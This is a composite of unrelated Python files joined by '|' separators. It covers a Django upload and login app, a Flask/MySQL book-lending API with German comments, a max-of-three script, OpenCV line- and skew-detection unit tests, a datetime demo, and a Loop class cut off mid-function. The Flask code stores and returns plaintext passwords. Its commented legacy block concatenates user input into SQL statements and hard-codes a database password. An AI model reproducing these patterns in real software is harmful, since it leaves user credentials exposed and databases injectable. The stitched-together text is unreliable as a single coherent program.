            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
    {
        'BACKEND': 'django.template.backends.jinja2.Jinja2',
        'DIRS': [],
        'APP_DIRS': True,  # searches jinja2/ dirs inside installed apps
        'OPTIONS': {
            'environment': 'apps.base.jinja2_environment.environment',
            'extensions': [
                'compressor.contrib.jinja2ext.CompressorExtension',
                'jinja2.ext.i18n',
                'jinja2.ext.with_',
            ],
        }
    },
]
import os
from django import forms
from django.shortcuts import render
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect, HttpResponse
from django.contrib.auth.decorators import login_required
from django.contrib.auth import authenticate, login, logout
from .forms import UploadFileForm, FileTable, File
from cloud.settings import MEDIA_URL, MEDIA_ROOT
# from django.views.generic.edit import FormView
# class FileFieldView(FormView):
# form_class = UploadFileForm
# template_name = 'upload.html' # Replace with your template.
# success_url = 'index.html' # Replace with your URL or reverse().
#
# def post(self, request, *args, **kwargs):
# print("HERE")
# form_class = self.get_form_class()
# form = self.get_form(form_class)
# files = request.FILES.getlist('file_field')
# if form.is_valid():
# for f in files:
# request.user.profile.files.append(f)
# print(f)
# request.user.save()
#
# return self.form_valid(form)
# else:
# return self.form_invalid(form)
def index(request):
    """Landing page: welcome view for active users, plain index otherwise."""
    if not request.user.is_active:
        return render(request, 'index.html')
    return welcome(request)
def upload(request):
    """Handle a multi-file upload.

    On a valid POST, each uploaded file is streamed to disk under
    MEDIA_ROOT/<username>/ and registered on the user's profile; otherwise
    the upload form is rendered.
    """
    form = UploadFileForm()
    if request.method == 'POST':
        form = UploadFileForm(request.POST, request.FILES)
        if form.is_valid():
            files = request.FILES.getlist('file_field')
            for f in files:
                file = File(f)
                path = os.path.join(MEDIA_ROOT, request.user.username)
                if not os.path.exists(path):
                    os.mkdir(path)
                path = os.path.join(path, file.name)
                # Write in chunks so large files are not loaded into memory.
                with open(path, 'wb+') as destination:
                    for chunk in f.chunks():
                        destination.write(chunk)
                if file not in request.user.profile.files:
                    request.user.profile.files.append(file)
            # Save once after all files are registered (was saved per file).
            request.user.save()
            return index(request)
    # Bug fix: pass the form *instance* to the template, not the class —
    # an invalid POST now re-renders the bound form with its errors.
    return render(request, 'upload.html', context={'user': request.user, 'form': form})
def welcome(request):
    """Render the welcome page with a table of the user's files (name/date)."""
    data = [{'name': file.name, 'date': file.date}
            for file in request.user.profile.files]
    table = FileTable(data)
    # Removed leftover debug print(table).
    return render(request, 'welcome.html', context={'user': request.user, 'table': table})
def user_login(request):
    """Authenticate posted credentials and start a session.

    GET renders the index page; POST validates the credentials and
    redirects to the index view on success.
    """
    if request.method != 'POST':
        return render(request, 'index.html')
    username = request.POST.get('username')
    password = request.POST.get('password')
    user = authenticate(username=username, password=password)
    if user is None:
        return HttpResponse("Invalid login details.")
    if not user.is_active:
        return HttpResponse("Account not active")
    login(request, user)
    return HttpResponseRedirect(reverse('index'))
@login_required
def user_logout(request):
    """End the current session and redirect to the index page."""
    logout(request)
    return HttpResponseRedirect(reverse('index'))
@login_required
def user_account(request):
    """Account page; on POST, change the user's password.

    Requires the new password and its confirmation to match and the old
    password to authenticate before saving.
    """
    if request.method == 'POST':
        old = request.POST.get('password')
        password = request.POST.get('password_n')
        password_conf = request.POST.get('password_nconf')
        if password != password_conf:
            raise(forms.ValidationError("The two password fields must match."))
        if not authenticate(username = request.user.username, password = old):
            # Bug fix: the old message blamed an old/new mismatch, but this
            # branch means the *current* password failed to authenticate.
            raise(forms.ValidationError("The old password is incorrect."))
        else:
            request.user.set_password(password)
            request.user.save()
            # NOTE(review): set_password invalidates the session hash, so the
            # user is likely logged out after this — confirm that is intended.
            return index(request)
    # Removed unused local `username`.
    return render(request, 'account.html', context={'user': request.user})
|
from flask import Flask, jsonify, request
import mysql.connector
#from flaskext import MySQL
from flask_mysqldb import MySQL
from datetime import datetime
app = Flask(__name__)
# Database connection settings (consumed by flask_mysqldb via app.config).
app.config['MYSQL_HOST']= 'localhost'
app.config['MYSQL_USER']= 'Bob'
# NOTE(review): empty DB password — confirm this is only for local development.
app.config['MYSQL_PASSWORD']= ''
app.config['MYSQL_DB']= 'Buecherverwaltung'
mysql= MySQL(app)
# Zip field names with row values so the frontend can decode the payload as JSON objects.
# modeller: ("id","email","passwort") / ("id", "titel", "autor", "verlag", "erscheinungsjahr", "status")
def prepareforJSON(listFromDB, modeller):
    """Pair every DB row with the field names in `modeller`.

    Returns a list of dicts so the frontend can decode the payload as a
    list of JSON objects.
    """
    return [dict(zip(modeller, row)) for row in listFromDB]
def checker_Contains(liste_db,parameter_1,parameter_2):
    """Return 'yes' if any row matches both parameters, else 'no'.

    Compares column 1 against `parameter_1` and column 2 against
    `parameter_2` (e.g. email/password or title/author).
    """
    matches = [(row[1], row[2]) for row in liste_db
               if row[1] == parameter_1 and row[2] == parameter_2]
    return 'yes' if matches else 'no'
# Check whether the book is currently available: returns 'free' when its status is 'in', 'not free' otherwise.
def checkStatus(query,id):
    """Return 'free' if the book with this id currently has status 'in'.

    `query` is the full SELECT * result from the buecher table: column 0
    holds the id and column 5 the status ('in' = available).
    """
    available = [row for row in query if row[0] == id and row[5] == 'in']
    return 'free' if available else 'not free'
# Check whether this user borrowed the book: True means the user may return it,
# False means the book is not checked out to this user and cannot be returned by them.
def checkerUser(query,id, email):
    """Return True if the book `id` is currently checked out to `email`.

    `query` is the full SELECT * result from the buecher table: column 0
    holds the id and column 5 the status (borrower email or 'in'). Only
    the borrowing user may return a book.
    Removed a leftover debug print of the matched rows.
    """
    return any(row[0] == id and row[5] == email for row in query)
# List all users, used to check whether a user exists in the system.
@app.route('/api/users', methods=['GET'])
def all_users():
    """Return every user as a JSON list of {'id', 'email', 'passwort'} objects."""
    cur = mysql.connection.cursor()
    cur.execute("SELECT * FROM users")
    result = cur.fetchall()
    cur.close()
    modeller=("id", "email", "passwort")
    final_result= prepareforJSON(result,modeller)
    #return result
    # NOTE(review): this exposes the stored passwords to API clients — confirm intended.
    return jsonify(final_result)
# The frontend posts JSON with email and password; the user is then added to the database.
@app.route('/api/register', methods=['POST'])
def add_user():
    """Register a new user unless the email/password pair already exists.

    Expects JSON with 'email' and 'passwort'; responds with
    'register done' or 'register fail'.
    """
    data= request.get_json()
    email = data['email']
    passwort = data['passwort']
    cur = mysql.connection.cursor()
    try:
        cur.execute("SELECT * FROM users")
        list_users= cur.fetchall()
        if (checker_Contains(list_users,email,passwort)== 'no'):
            cur.execute("INSERT INTO users (email, passwort) VALUES (%s, %s)", (email, passwort))
            mysql.connection.commit()
            result = {'message': 'register done', 'email' : email}
        else:
            result = {'message': 'register fail'}
    finally:
        # Bug fix: the cursor previously leaked on the 'register fail' path.
        cur.close()
    # NOTE(review): passwords appear to be stored in plaintext — confirm and hash upstream.
    return jsonify(result)
# login() succeeds only when the user actually exists in the system.
@app.route('/api/login', methods=['POST'])
def login():
    """Validate posted credentials against the users table.

    Responds with {'message': 'login done', 'email': ...} on success and
    {'message': 'login fail'} otherwise.
    """
    data = request.get_json()
    email = data['email']
    passwort= data['passwort']
    cur = mysql.connection.cursor()
    #cur.execute("SELECT * FROM users where email= %s", str(email) ) # kept alternative: filter by email only, since emails must be unique in the database
    cur.execute("SELECT * FROM users")
    list_users = cur.fetchall()
    cur.close()
    # Check whether the posted (email, passwort) pair exists among all users.
    # NOTE(review): loads the whole table and compares passwords in plaintext —
    # consider a filtered, parameterized query plus password hashing.
    if(checker_Contains( list_users,email,passwort) == 'no'):
        result = {'message': 'login fail'}
    else:
        result = {'message': 'login done', 'email' : email}
    # 'done' when the user's data is in the list, 'fail' otherwise.
    return jsonify(result)
# List all books on request.
@app.route('/api/all_Buch', methods=['GET'])
def all_buch():
    """Return every book as a JSON list of objects (id..status)."""
    cur = mysql.connection.cursor()
    cur.execute("SELECT * FROM buecher")
    result = cur.fetchall()
    cur.close()
    modeller = ("id", "titel", "autor", "verlag", "erscheinungsjahr", "status")
    #modeller = {"status", "titel", "id", "verlag", "titel", "erscheinungsjahr"}
    final_result = prepareforJSON(result,modeller)
    return jsonify(final_result)
# Add a new book to the database.
# Expected fields: titel, autor, verlag and erscheinungsjahr.
@app.route('/api/add_buch', methods=['POST'])
def hinzufügen_buch():
    """Add a new book unless one with the same title and author exists.

    Expects JSON with 'titel', 'autor', 'verlag' and 'erscheinungsjahr'
    (date string in '%m-%d-%Y' format).
    """
    data = request.get_json()
    titel= data['titel']
    autor= data['autor']
    verlag= data['verlag']
    date_str= data['erscheinungsjahr']
    erscheinungsjahr = datetime.strptime(date_str, '%m-%d-%Y').date()
    cur = mysql.connection.cursor()
    try:
        # Duplicate check on (titel, autor) against all existing books.
        cur.execute("SELECT * FROM buecher")
        list_buecher = cur.fetchall()
        if (checker_Contains(list_buecher,titel,autor) == 'no'):
            cur.execute("INSERT INTO buecher (titel,autor, verlag, erscheinungsjahr) VALUES (%s,%s,%s,%s)",
                (titel, autor, verlag, erscheinungsjahr))
            mysql.connection.commit()
            result = {'message': 'Buch added'}
        else:
            result= {'message': 'Buch already exists'} # duplicate -> report it
    finally:
        # Bug fix: the cursor previously leaked on the duplicate path.
        # Also removed the unused local `val`.
        cur.close()
    return jsonify(result)
# Delete the book with the given id from the database.
# Only the book's id is expected in the request body.
@app.route('/api/delete_buch', methods=['POST'])
def delet_buch():
    """Delete the book with the posted 'id'.

    Responds with 'buch deleted' when a row was removed and
    'buch not exist' otherwise.
    """
    data = request.get_json()
    id= data['id']
    cur = mysql.connection.cursor()
    #response=cur.execute("DELETE FROM buecher where id = " + str(id) )
    response = cur.execute("DELETE FROM buecher where id = %s ", (id,) )
    # Reset AUTO_INCREMENT so the deleted book's id can be reused.
    # NOTE(review): MySQL ignores an AUTO_INCREMENT value lower than the
    # current maximum id, so this only works for the highest id — confirm intended.
    #response_1= cur.execute("ALTER TABLE buecher AUTO_INCREMENT = " + str(id) )
    response_1 = cur.execute("ALTER TABLE buecher AUTO_INCREMENT = %s ", (id,) )
    mysql.connection.commit()
    cur.close()
    # cur.execute returns the affected row count; > 0 means the DELETE matched.
    if response > 0:
        result = {'message': 'buch deleted'}
        #result = {'message': 'buch deleted', 'response': response}
    else:
        result = {'message': 'buch not exist'}
    return jsonify( result )
# TODO: needs rework.
# Expects the book id and the user's email.
@app.route('/api/buch_out', methods=['PUT'])
def ausleihen():
    """Check a book out to a user (max 3 books per user).

    Expects JSON with the book 'id' and the borrower's 'email'. A book's
    status column is either 'in' (available) or the borrower's email.
    """
    data = request.get_json()
    email= data['email']
    id= data['id']
    # Status semantics: 'in' = new or returned book; otherwise the email
    # address of the user who borrowed it.
    # Fetch all books (id, titel, autor, verlag, erscheinungsjahr, status).
    cur = mysql.connection.cursor()
    #response= cur.execute("SELECT * FROM buecher WHERE status = %s " , email )
    cur.execute("SELECT * FROM buecher")
    myresult = cur.fetchall()
    # Count how many books this user has already borrowed.
    list_out = []
    for each_list in myresult:
        # status is column index 5 (6th column) of the buecher table
        # print(each_list)
        status = each_list[5]
        # print(status)
        if status == email: # email alone suffices because emails are unique
            list_out.append(status)
    # Update the book's status with the user's email only if the user holds
    # fewer than 3 books and the requested book is available.
    if len(list_out )< 3 and checkStatus(myresult,int(id) )== 'free':
        # cur.execute("UPDATE buecher SET stauts = %s WHERE id = %s ", (email, id))
        response = cur.execute("UPDATE buecher SET status = %s WHERE id = %s ", (email, id))
        mysql.connection.commit()
        cur.close()
        # 'done' when the UPDATE affected a row, 'fail' otherwise.
        #result = {'ausgeliehen': 'done'}
        if response > 0:
            result_1 = {'ausgeliehen': 'done'}
        else:
            result_1 = {'ausgeliehen': 'fail'}
        result = result_1
    else:
        # NOTE(review): this branch also fires when the book simply is not
        # free, yet the message only mentions the 3-book limit; the cursor is
        # also left open on this path — confirm and fix upstream.
        result = {'ausgeliehen': ' max 3 books'}
    return jsonify(result)
# TODO: needs rework.
# Expects the book id (and the user's email).
@app.route('/api/buch_in', methods=['PUT'])
def zurueckgeben():
    """Return a borrowed book: reset its status to 'in'.

    Expects JSON with the book 'id' and the borrower's 'email'; only the
    user who borrowed the book may return it.
    """
    data = request.get_json()
    id= data['id']
    email= data['email']
    status='in'
    cur = mysql.connection.cursor()
    cur.execute("SELECT * FROM buecher")
    query= cur.fetchall()
    if checkerUser(query,id,email)== True :
        response= cur.execute("UPDATE buecher SET status= %s WHERE id = %s ",(status, id) )
        mysql.connection.commit()
        cur.close()
        # 'done' when the UPDATE affected a row, 'fail' otherwise.
        if response > 0:
            result_1 = {'zurueckgegeben': 'done'}
        else:
            result_1 = {'zurueckgegeben': 'fail'}
        result= result_1
    else:
        # NOTE(review): the cursor is left open on this path — confirm and fix upstream.
        result= {'zurueckgegeben': 'not the same user'}
    return jsonify(result)
# Start the development server when this module is executed directly.
if __name__ == '__main__':
    app.run(port=5001, debug=True)
# Legacy test version using mysql.connector directly (plain Python, without Flask-MySQL) — kept for reference below.
"""
from flask import Flask, jsonify, request
import mysql.connector
from datetime import datetime
app = Flask(__name__)
#Verbindung mit der Datenbank
mydb = mysql.connector.connect(
host='localhost',
user='Bob',
passwd='Iamusing24@',
)
# json file von Frontend beinhaltet (email und passwort), und dann wird der User in der Datenbank hinzugefügt
@app.route('/api/addUser', methods=['POST'])
def add_user():
data= request.get_json()
email = data['email']
passwort = data['passwort']
mycursor = mydb.cursor()
sql = "INSERT INTO buecherverwaltung.users (email, passwort) VALUES (%s, %s)"
val = (email, passwort)
mycursor.execute(sql, val)
mydb.commit()
result={'message':'done'}
return jsonify(data)
# login() function nur wenn der User wirklich im System existiert
@app.route('/api/login', methods=['POST'])
def login():
data = request.get_json()
email = data['email']
passwort= data['passwort']
mycursor = mydb.cursor()
mycursor.execute("SELECT * FROM buecherverwaltung.buecher where status=" + email)
myresult = mycursor.fetchall()
# ich checke in der Liste von allen User, ob der angegebenen Resquest(email and user ) in unserm System existiert
#und wenn ja wird eine message mit 'done', wenn nein mit message 'fail'
my_list = []
for i in myresult:
if (i[1] == email and i[2] == passwort):
my_list.append((i[1], i[2]))
# wenn die Daten von User in der Liste steht => done
# wenn nicht, => fail
if( len( my_list) >0 ):
result = {'message': 'done'}
return jsonify(result)
else:
result = {'message': 'fail'}
return jsonify(result)
#Aufruf aller User , wenn es geprüft wird, ob der User im System existiert
@app.route('/api/all_Users', methods=['GET'])
def all_users():
mycursor = mydb.cursor()
mycursor.execute("SELECT * FROM users")
myresult = mycursor.fetchall()
#print(myresult)
return jsonify(myresult)
#Aufruf aller User , wenn sie gefragt werden
@app.route('/api/all_Buch', methods=['GET'])
def all_buch():
mycursor = mydb.cursor()
mycursor.execute("SELECT * FROM buecherverwaltung.buecher")
myresult = mycursor.fetchall()
return jsonify(myresult)
# man fügt ein neues Buch in der Datenbank (im System) hinzu
#Wir erwarten hier : titel, autor, verlag und ercheinungsjahr
@app.route('/api/add_buch', methods=['POST'])
def hinzufügen_buch():
data = request.get_json()
titel= data['titel']
autor= data(['autor'])
verlag= data(['verlag'])
date_str= data(['ercheinungsjahr'])
ercheinungsjahr = datetime.strptime(date_str, '%m-%d-%Y').date()
mycursor = mydb.cursor()
sql = "INSERT INTO buecherverwaltung.buecher (titel,autor, verlag, ercheinungsjahr) VALUES (%s, %s,%s,,%s,)"
val = (titel,autor,verlag, ercheinungsjahr )
mycursor.execute(sql, val)
mydb.commit()
result = {'message': 'done'}
return jsonify(result)
# Hier wird nur das ID des Buchs bekommen und dank diesem id wird das Buch mit ementsprechenden ID in der Datenbank (im System ) gelöscht
# Nur id des Buchs wird beim Löschen erwartet
@app.route('/api/one_buch/', methods=['POST'])
def delet_buch():
data = request.get_json()
id= data['id']
mycursor = mydb.cursor()
response=mycursor.execute("DELETE FROM buecherverwaltung.buecher where id= "+id )
mydb.commit()
if response > 0:
result = {'message': 'record delete'}
else:
result = {'message': 'no record found'}
return jsonify({'result': result})
# id -buch und email des Users werden erwartet
@app.route('/api/status/out', methods=['POST'])
def ausleihen():
data = request.get_json()
email= data['email']
id= data['id']
# im System sind 02 status zu erkenen: 'in': neues Buch oder zurückgegeben und dann einfach die email-adresse (von der User , der das Buch ausgeliehen hast )
# hier kriegen wir eine Liste von allen Buecher (id, titel,autor,verlag,erscheinungsjahr, status )
mycursor = mydb.cursor()
mycursor.execute("SELECT * FROM buecherverwaltung.buecher where status="+email)
myresult = mycursor.fetchall()
# hier rechnen wir einfach nur wie viel Bücher den User schon ausgeliehen hat und vergleichen wir, ob das unter 4 ist
list_out=[]
for i in myresult:
#position_status[5] : denn in der Tabelle buehcer ist status in der 6. Spalte
position_status = i[5]
if position_status == email :
list_out.append(position_status)
# wenn der User(mitgilfe seiner Email) unter 4 Bücher ausgeliehen hat, dann aktualisieren wir den Status des Buchs im System mit seinem email.
if len(list_out <4 ):
mycursor.execute("UPDATE buecherverwaltung.buecher SET stauts=' "+str(email)+" ' WHERE id=" +id )
mydb.commit()
#ich schicken hier 'done' als response wenn die Function ausleihen funktioniert hat und wenn nicht 'fail'
result= {'ausgeliehen': 'done' }
return jsonify(result)
else:
result = {'ausgeliehen': 'fail'}
return jsonify(result)
# Nur id -buch wird erwartet
@app.route('/api/status/in', methods=['POST'])
def zurueckgeben():
data = request.get_json()
id= data['id']
mycursor = mydb.cursor()
mycursor.execute("UPDATE buecherverwaltung.buecher SET stauts=' " + str('in') + " ' WHERE id=" + id)
mydb.commit()
result= {'zurueckgegeben':'done'}
return jsonify(result)
if __name__ == '__main__':
app.run(port=5001, debug=True)
"""
|
def biggest(num1,num2,num3):
    """Return the largest of the three numbers.

    Bug fix: the original chained comparisons missed orderings such as
    (5, 1, 3), where num1 is largest but num2 <= num3, and returned the
    wrong value; max() handles every ordering, including ties.
    """
    return max(num1, num2, num3)
# Script entry: read three integers from stdin and print the largest.
num1=int(input("enter the number1:"))
num2=int(input("enter the number2:"))
num3=int(input("enter the number3:"))
print(biggest(num1,num2,num3))
|
import cv2 as cv2
import unittest
import getlines
import skew
import extract
import math
##WHAT THESE TESTS DO:
# The first twelve test classes represent different image inputs to the functions within
# getlines.py and skew.py, which represent the two facets of our processing algorithm.
# The tests within classes:
# -test_merge_text: tests basic requirement of getlines.isolateLines (which is our line
# getting function comprised of our home-cooked combination of opencv methods), that
# our chosen combination of image-processing methods reduces the number of contours
# (simplifies) the image.
# -test_text_area_dilation: tests more specific requirement of getlines.getLines, that
# the number of identified lines through our line-getting function are accurate to what
# we observe to be the number of lines in the actual image (to within an acceptable
# discrepancy)
# -test_calculate_angle: tests skew.rotate/skew.straighten to make sure that the skew
# angle detected by our skew.py functions is equal to the skew angle we observe in the
# image (to within an acceptable discrepancy).
#
# The last two test classes represent different .pdf inputs to the functions within
# extract.py, which represents the processing functionality of page-splitting (splitting
# a multi-page .pdf document into its separate images)
# Tests within class:
# -test_extract_images: tests that extract.extractImages returns the number of images
# that are observed in the document
class all_white_test_case(unittest.TestCase):
    """Edge case: an entirely white page should yield zero detected lines."""
    def setUp(self):
        #all white image
        self.image = cv2.imread("testimg/white.jpg")
        self.lines = getlines.getLines(self.image)
    def test_merge_text(self):
        #makes sure number of contours is decreasing through processing
        after_len = len(cv2.findContours(getlines.isolateLines(self.image), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
        before_len = len(cv2.findContours(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
        self.assertTrue(after_len <= before_len)
    def test_text_area_dilation(self):
        #compares number of detected lines to number we observe to make sure they are equal
        self.assertTrue(len(self.lines) == 0)
    #cases with no lines will be presumed to be straight, no rotational testing
class all_black_test_case(unittest.TestCase):
    """Edge case: an entirely black page should yield zero detected lines."""
    def setUp(self):
        #all black image
        self.image = cv2.imread("testimg/black.jpg")
        self.lines = getlines.getLines(self.image)
    def test_merge_text(self):
        #makes sure number of contours is decreasing through processing
        after_len = len(cv2.findContours(getlines.isolateLines(self.image), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
        before_len = len(cv2.findContours(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
        self.assertTrue(after_len <= before_len)
    def test_text_area_dilation(self):
        #compares number of detected lines to number we observe to make sure they are equal
        self.assertTrue(len(self.lines) == 0)
    #cases with no lines will be presumed to be straight, no rotational testing
class one_picture_test_case(unittest.TestCase):
    """A page containing only a single picture should detect ~0 text lines."""
    def setUp(self):
        #one picture image
        self.image = cv2.imread("testimg/image.jpg")
        self.lines = getlines.getLines(self.image)
    def test_merge_text(self):
        #makes sure number of contours is decreasing through processing
        after_len = len(cv2.findContours(getlines.isolateLines(self.image), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
        before_len = len(cv2.findContours(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
        self.assertTrue(after_len <= before_len)
    def test_text_area_dilation(self):
        #compares number of detected lines to number we observe to make sure they are equal
        # Removed leftover Python-2 debug statement `print len(self.lines)`
        # that polluted the test output.
        self.assertTrue(abs(len(self.lines) - 0) < 2)
    #cases with no lines will be presumed to be straight, no rotational testing
class perfect_text_test_case(unittest.TestCase):
    """Clean, unskewed text page: ~18 lines expected, near-zero skew angle."""
    def setUp(self):
        #one picture image
        self.image = cv2.imread("testimg/perfecttext.jpg")
        self.lines = getlines.getLines(self.image)
    def test_merge_text(self):
        #makes sure number of contours is decreasing through processing
        after_len = len(cv2.findContours(getlines.isolateLines(self.image), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
        before_len = len(cv2.findContours(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
        self.assertTrue(after_len <= before_len)
    def test_text_area_dilation(self):
        #compares number of detected lines to number we observe to make sure they are equal
        self.assertTrue((len(self.lines) - 18) < 5 and (len(self.lines) - 18) >= 0)
    def test_calculate_angle(self):
        #compares calculated angle to observed angle to make sure they are equal
        img, angle = skew.straighten(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY))
        self.assertTrue(abs(angle) < 10)
class text_photo_test_case(unittest.TestCase):
    """Photographed text page: ~15 lines expected, near-zero skew angle."""
    def setUp(self):
        #one picture image
        self.image = cv2.imread("testimg/textphoto.jpg")
        self.lines = getlines.getLines(self.image)
    def test_merge_text(self):
        #makes sure number of contours is decreasing through processing
        # Photos need adaptive thresholding for a fair before/after comparison.
        after_len = len(cv2.findContours(getlines.isolateLines(self.image), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
        before_len = len(cv2.findContours(cv2.adaptiveThreshold(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY),255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\
            cv2.THRESH_BINARY, 11, 2), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
        self.assertTrue(after_len <= before_len)
    def test_text_area_dilation(self):
        #compares number of detected lines to number we observe to make sure they are equal
        self.assertTrue((len(self.lines) - 15) < 5 and (len(self.lines) - 15) >= 0)
    def test_calculate_angle(self):
        #compares calculated angle to observed angle to make sure they are equal
        img, angle = skew.straighten(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY))
        self.assertTrue(abs(angle - 0) < 10)
class picture_and_text_test_case(unittest.TestCase):
    """Mixed picture-and-text page: ~35 lines expected, near-zero skew angle."""
    def setUp(self):
        #one picture image
        self.image = cv2.imread("testimg/perfecttextwithimage.jpg")
        self.lines = getlines.getLines(self.image)
    def test_text_area_dilation(self):
        #compares number of detected lines to number we observe to make sure they are equal
        self.assertTrue((len(self.lines) - 35) < 5 and (len(self.lines) - 35) >= 0)
    def test_calculate_angle(self):
        #compares calculated angle to observed angle to make sure they are equal
        img, angle = skew.straighten(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY))
        self.assertTrue(abs(angle - 0) < 2)
class different_sized_test_case(unittest.TestCase):
    """Page with unusual formatting/sizing: ~37 lines expected."""
    def setUp(self):
        #one picture image
        self.image = cv2.imread("testimg/strangeformatting.jpg")
        self.lines = getlines.getLines(self.image)
        self.img, self.angle = skew.straighten(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY))
    def test_merge_text(self):
        #makes sure number of contours is decreasing through processing
        after_len = len(cv2.findContours(getlines.isolateLines(self.image), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
        before_len = len(cv2.findContours(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
        self.assertTrue(after_len <= before_len)
    def test_text_area_dilation(self):
        #compares number of detected lines to number we observe to make sure they are equal
        self.assertTrue((len(self.lines) - 37) < 5 and (len(self.lines) - 37) >= 0)
class skewed_pAndT_test_case(unittest.TestCase):
    """Skewed picture-and-text page: straighten first, then expect ~35 lines
    and a detected skew of ~15 degrees."""
    def setUp(self):
        #one picture image
        self.image = cv2.imread("testimg/rotatedwithimage.jpg")
        self.img, self.angle = skew.straighten(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY))
        self.lines = getlines.getLines(self.img)
    def test_text_area_dilation(self):
        #compares number of detected lines to number we observe to make sure they are equal
        self.assertTrue((len(self.lines) - 35) < 5 and (len(self.lines) - 35) >= 0)
    def test_calculate_angle(self):
        #compares calculated angle to observed angle to make sure they are equal
        self.assertTrue(abs(self.angle - 15) < 2)
class skewed_text_test_case(unittest.TestCase):
    """Skewed text-only page: straighten first, then expect ~18 lines and a
    detected skew of ~-15 degrees."""
    def setUp(self):
        #one picture image
        self.image = cv2.imread("testimg/rotated.jpg")
        self.img, self.angle = skew.straighten(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY))
        self.lines = getlines.getLines(self.img)
    def test_text_area_dilation(self):
        #compares number of detected lines to number we observe to make sure they are equal
        self.assertTrue((len(self.lines) - 18) < 5 and (len(self.lines) - 18) >= 0)
    def test_calculate_angle(self):
        #compares calculated angle to observed angle to make sure they are equal
        self.assertTrue(abs(self.angle + 15) < 2)
## added for iteration 2
class noisy_text1(unittest.TestCase):
    """Text with background noise (newspaper scan): ~20 lines, ~3 deg skew."""
    def setUp(self):
        #text with background noise (from newspaper)
        self.image = cv2.imread("testimg/noisy1fixed.jpg")
        self.img, self.angle = skew.straighten(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY))
        self.lines = getlines.getLines(self.img)
    def test_text_area_dilation(self):
        #compares number of detected lines to number we observe to make sure they are equal
        # Removed leftover Python-2 debug statement `print len(self.lines)`.
        self.assertTrue((len(self.lines) - 20) < 5 and (len(self.lines) - 20) >= 0)
    def test_calculate_angle(self):
        #compares calculated angle to observed angle to make sure they are equal
        self.assertTrue(abs(self.angle - 3) < 10)
class noisy_text2(unittest.TestCase):
    """Text with localized noise (bent corner): ~42 lines, ~-2 deg skew."""
    def setUp(self):
        #text with one-area noise (from bent corner)
        self.image = cv2.imread("testimg/noisy2fixed.jpg")
        self.img, self.angle = skew.straighten(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY))
        self.lines = getlines.getLines(self.img)
    def test_text_area_dilation(self):
        #compares number of detected lines to number we observe to make sure they are equal
        # Removed leftover Python-2 debug statement `print len(self.lines)`.
        self.assertTrue(abs(len(self.lines) - 42) < 5)
    def test_calculate_angle(self):
        #compares calculated angle to observed angle to make sure they are equal
        self.assertTrue(abs(self.angle + 2) < 2)
class black_margins(unittest.TestCase):
    """Page with large black margins from a copier error: ~53 lines, ~2 deg skew."""
    def setUp(self):
        #text with large amount of black space from copier error
        self.image = cv2.imread("testimg/blackmarginsfixed.jpg")
        self.img, self.angle = skew.straighten(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY))
        self.lines = getlines.getLines(self.img)
    def test_text_area_dilation(self):
        #compares number of detected lines to number we observe to make sure they are equal
        self.assertTrue((len(self.lines) - 53) < 5 and (len(self.lines) - 53) >= 0)
    def test_calculate_angle(self):
        #compares calculated angle to observed angle to make sure they are equal
        self.assertTrue(abs(self.angle - 2) < 2)
class long_pdf(unittest.TestCase):
    """Page-splitting: a 57-image PDF should yield exactly 57 extracted images."""
    def setUp(self):
        #specify file path for pdf with 57 images
        self.filepath = "testimg/Biagioli_GalileoCourtier.PDF"
    def test_extract_images(self):
        #compares number of images extracted from pdf to number we observe to make sure they are equal
        self.assertTrue(len(extract.extractImages(self.filepath)) == 57)
class empty_pdf(unittest.TestCase):
    """Page-splitting edge case: an empty PDF should yield zero images."""
    def setUp(self):
        #specify file path for pdf with 0 images
        self.filepath = "testimg/empty.pdf"
    def test_extract_images(self):
        #compares number of images extracted from pdf to number we observe to make sure they are equal
        self.assertTrue(len(extract.extractImages(self.filepath)) == 0)
# Run the whole suite when this file is executed directly.
if __name__ == '__main__':
    unittest.main()
|
# Demo of the datetime module: current time, components, and strftime formatting.
import datetime
x=datetime.datetime.now()
print(x)  # full current timestamp
x=datetime.datetime.now()
print(x.year)  # year component only
print(x.strftime("%A"))  # weekday name, e.g. 'Monday'
x=datetime.datetime(2019,9,19)
print(x)  # constructed date (midnight)
x=datetime.datetime(2019,9,19)
print(x.strftime("%B"))  # month name, e.g. 'September'
|
import command
class Loop(command.Command):
    """Command that executes the next queued frame as a loop body."""
    def execute(self, env):
        # The loop body is the next frame on the environment's queue.
        body = env.qframe.popleft()
        resp = body.execute_loop(env)
        if resp == command.LOOP_TERMINATE:
            # A break inside the body ends only the loop, not the caller.
            return command.NO_TERMINATE
        elif resp == command.FUNC_TERMINATE:
            # Propagate function-level termination upward.
